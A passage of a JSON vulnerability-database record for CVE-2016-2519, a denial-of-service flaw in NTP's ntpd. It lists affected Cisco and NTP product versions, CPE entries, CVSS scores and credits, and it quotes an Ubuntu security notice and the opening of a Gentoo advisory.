"eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system e-series blade server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "support central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3210" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1210" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sentinel", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "network device security assessment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.92" }, { "model": "4.2.8p7", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "BID", "id": "88204" }, { "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "db": "NVD", "id": "CVE-2016-2519" }, { "db": "CNNVD", "id": "CNNVD-201604-610" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:p6:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.2.8", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.27:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.28:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.34:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.35:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.41:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.42:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.50:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.57:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.58:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.64:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.65:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.72:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.73:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.80:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.87:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.88:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.89:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.90:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.21:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.29:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.36:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.37:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.43:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.44:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.51:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.52:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.59:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.66:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.67:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.68:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.74:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.75:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.81:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.82:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.91:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.23:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.38:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.39:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.45:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.46:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.47:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.53:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.54:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.60:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.61:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.69:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.76:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.77:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.83:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.84:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.24:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.25:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.26:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.33:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.40:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.48:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.49:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.55:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.56:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.62:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.63:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.70:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.71:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.78:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.79:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.85:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.86:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2519" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Yihan Lian of the Cloud Security Team, Qihoo 360", "sources": [ { "db": "BID", "id": "88204" }, { "db": "CNNVD", "id": "CNNVD-201604-610" } ], "trust": 0.9 }, "cve": "CVE-2016-2519", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 4.9, "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:S/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 4.9, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2519", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:S/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 2.2, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 5.9, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2519", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2519", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201604-610", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-2519", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2519" }, { "db": "JVNDB", "id": "JVNDB-2016-007715" }, { "db": "NVD", "id": "CVE-2016-2519" }, { "db": "CNNVD", "id": "CNNVD-201604-610" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ntpd in NTP before 4.2.8p7 and 4.3.x before 4.3.92 allows remote attackers to cause a denial of service (ntpd abort) by a large request data value, which triggers the ctl_getitem function to return a NULL value. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \nVersions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ==========================================================================\nUbuntu Security Notice USN-3349-1\nJuly 05, 2017\n\nntp vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 17.04\n- Ubuntu 16.10\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. \n\nSoftware Description:\n- ntp: Network Time Protocol daemon and utility programs\n\nDetails:\n\nYihan Lian discovered that NTP incorrectly handled certain large request\ndata values. This issue only affected\nUbuntu 16.04 LTS. (CVE-2016-2519)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed\naddresses when performing rate limiting. This issue only affected\nUbuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7426)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted\nbroadcast mode packets. This issue only affected Ubuntu 14.04 LTS,\nUbuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7427, CVE-2016-7428)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain responses. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and\nUbuntu 16.10. (CVE-2016-7429)\n\nSharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly\nhandled origin timestamps of zero. A remote attacker could possibly use\nthis issue to bypass the origin timestamp protection mechanism. This issue\nonly affected Ubuntu 16.10. (CVE-2016-7431)\n\nBrian Utterback, Sharon Goldberg and Aanchal Malhotra discovered that NTP\nincorrectly performed initial sync calculations. This issue only applied\nto Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7433)\n\nMagnus Stubman discovered that NTP incorrectly handled certain mrulist\nqueries. This issue only affected Ubuntu\n16.04 LTS and Ubuntu 16.10. (CVE-2016-7434)\n\nMatthew Van Gund discovered that NTP incorrectly handled origin timestamp\nchecks. This issue only affected Ubuntu Ubuntu 16.10, and Ubuntu 17.04. \n(CVE-2016-9042)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control\nmode packets. A remote attacker could use this issue to set or unset traps. \nThis issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu\n16.10. (CVE-2016-9310)\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. This issue only applied to Ubuntu 14.04\nLTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9311)\n\nIt was discovered that NTP incorrectly handled memory when processing long\nvariables. A remote authenticated user could possibly use this issue to\ncause NTP to crash, resulting in a denial of service. (CVE-2017-6458)\n\nIt was discovered that NTP incorrectly handled memory when processing long\nvariables. A remote authenticated user could possibly use this issue to\ncause NTP to crash, resulting in a denial of service. This issue only\napplied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04. (CVE-2017-6460)\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly\nhandled the /dev/datum device. (CVE-2017-6462)\n\nIt was discovered that NTP incorrectly handled certain invalid settings\nin a :config directive. A remote authenticated user could possibly use\nthis issue to cause NTP to crash, resulting in a denial of service. \n(CVE-2017-6463)\n\nIt was discovered that NTP incorrectly handled certain invalid mode\nconfiguration directives. A remote authenticated user could possibly use\nthis issue to cause NTP to crash, resulting in a denial of service. \n(CVE-2017-6464)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 17.04:\n ntp 1:4.2.8p9+dfsg-2ubuntu1.1\n\nUbuntu 16.10:\n ntp 1:4.2.8p8+dfsg-1ubuntu2.1\n\nUbuntu 16.04 LTS:\n ntp 1:4.2.8p4+dfsg-3ubuntu5.5\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.11\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n https://www.ubuntu.com/usn/usn-3349-1\n CVE-2016-2519, CVE-2016-7426, CVE-2016-7427, CVE-2016-7428,\n CVE-2016-7429, CVE-2016-7431, CVE-2016-7433, CVE-2016-7434,\n CVE-2016-9042, CVE-2016-9310, CVE-2016-9311, CVE-2017-6458,\n CVE-2017-6460, CVE-2017-6462, CVE-2017-6463, CVE-2017-6464\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p9+dfsg-2ubuntu1.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p8+dfsg-1ubuntu2.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.5\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.11\n\n\n. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE 